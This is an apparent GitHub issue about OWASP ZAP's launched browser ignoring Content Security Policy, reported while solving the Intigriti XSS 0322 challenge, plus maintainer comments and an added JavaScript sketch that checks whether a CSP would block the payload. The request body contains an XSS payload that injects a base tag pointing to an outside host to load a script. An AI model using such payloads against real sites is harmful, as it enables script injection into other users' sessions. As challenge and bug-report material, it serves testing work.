Hi team.
This is an issue that I experienced while solving the Intigriti XSS 0322 challenge recently.
A CSP exists in the response as shown below, but the CSP is not processed in the pre-configured browser.
Of course, I spent a little more time and eventually bypassed CSP. However, I was excited for a while because of the alert() of the pre-configured browser at the beginning of the test.
However, analysts who use ZAP should also be protected by CSP, and normal operation of CSP is required for accurate testing. I'm submitting this because it appears to be an issue :D
Request
POST https://challenge-0322.intigriti.io/challenge/LoveReceiver.php HTTP/1.1
token=b037132edc1c393820596e2bfd647b05823ed1c779950cd4eb2263fa0a32ebfe&FirstText=%3Cbase+href%3D%27https%3A%2F%2Fpocs.hahwul.com%2F%27%3E%3Cscript+src%3D%27%2Falert.js%27%3E%3C%2Fscript%3E&Hashing=aaa
A script is inserted into the Response and is protected by the CSP. Of course, the core of this challenge was CSP, but in the ZAP Pre-configured browser, the CSP is ignored and the script works.
Expected behavior
The XSS code does not work (because it is protected by CSP)
I've added both the "add-on" and "Component-Docs" labels until we decide how we want to address this. Also I've removed "bug" and added "enhancement" as (as far as I know) this is intentional, so adding an option etc. would be an enhancement.
Hi @kingthorin
Thank you so very very much!
I don't know if I can be of any help, but I'll try my best to test it (if you need my help). I'm rooting for you!
kingthorin changed the title from "CSP does not seem to work normally in pre-configured browser." to "CSP does not seem to work normally in launched browser" on Apr 7, 2022
Response header
I checked the options and scripts just in case the CSP Disable option was turned on, but there was nothing like that.
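As an added illustration (not part of the original issue and not ZAP code), the sketch below works out what a CSP-enforcing browser would do with the `<base href>` plus `<script src>` payload from the request in the report, so that an alert() seen in a browser that ignores CSP can be cross-checked. The policy string is constructed, because the response header is not reproduced on this page, and the function names are hypothetical.

```javascript
// Added example, not ZAP code. Simplified CSP check for one external <script src>:
// ports, paths, nonces, hashes and 'strict-dynamic' are not evaluated.
function parseCsp(header) {
  const directives = new Map();
  for (const part of header.split(';')) {
    const [name, ...sources] = part.trim().toLowerCase().split(/\s+/);
    // The first occurrence of a directive wins; later duplicates are ignored.
    if (name && !directives.has(name)) directives.set(name, sources);
  }
  return directives;
}

function sourceAllows(source, target, page) {
  if (source === "'self'") return target.origin === page.origin;
  if (source === '*') return target.protocol === 'http:' || target.protocol === 'https:';
  // 'none', 'unsafe-inline', nonce and hash sources: no match for a script tag without a nonce.
  if (source.startsWith("'")) return false;
  if (/^[a-z][a-z0-9+.-]*:$/.test(source)) return target.protocol === source; // scheme source
  const m = source.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?([^/:]+)/); // host source
  if (!m) return false;
  if (m[1] && m[1] + ':' !== target.protocol) return false;
  return m[2].startsWith('*.') ? target.hostname.endsWith(m[2].slice(1)) : m[2] === target.hostname;
}

// Decide what a CSP-enforcing browser would do with <base href=...><script src=...>.
function evaluateInjectedScript(cspHeader, pageUrl, baseHref, scriptSrc) {
  const csp = parseCsp(cspHeader);
  const page = new URL(pageUrl);
  const base = new URL(baseHref, page);
  // base-uri does not fall back to default-src: when absent, the <base> tag is honoured.
  const baseUri = csp.get('base-uri');
  const baseHonoured = !baseUri || baseUri.some(s => sourceAllows(s, base, page));
  const target = new URL(scriptSrc, baseHonoured ? base : page);
  const list = csp.get('script-src-elem') || csp.get('script-src') || csp.get('default-src');
  const blocked = Boolean(list) && !list.some(s => sourceAllows(s, target, page));
  return { target: target.href, baseHonoured, blocked };
}

// Constructed sample: page URL and payload values are from the report, the policy is made up.
const PAGE = 'https://challenge-0322.intigriti.io/challenge/LoveReceiver.php';
const SAMPLE_POLICY = "default-src 'none'; script-src 'self'; style-src 'self'";
console.log(evaluateInjectedScript(SAMPLE_POLICY, PAGE, 'https://pocs.hahwul.com/', '/alert.js'));
console.log(evaluateInjectedScript('', PAGE, 'https://pocs.hahwul.com/', '/alert.js'));
```

The second call, with an empty policy, models a browser in which the CSP is not applied: the same payload is reported as not blocked.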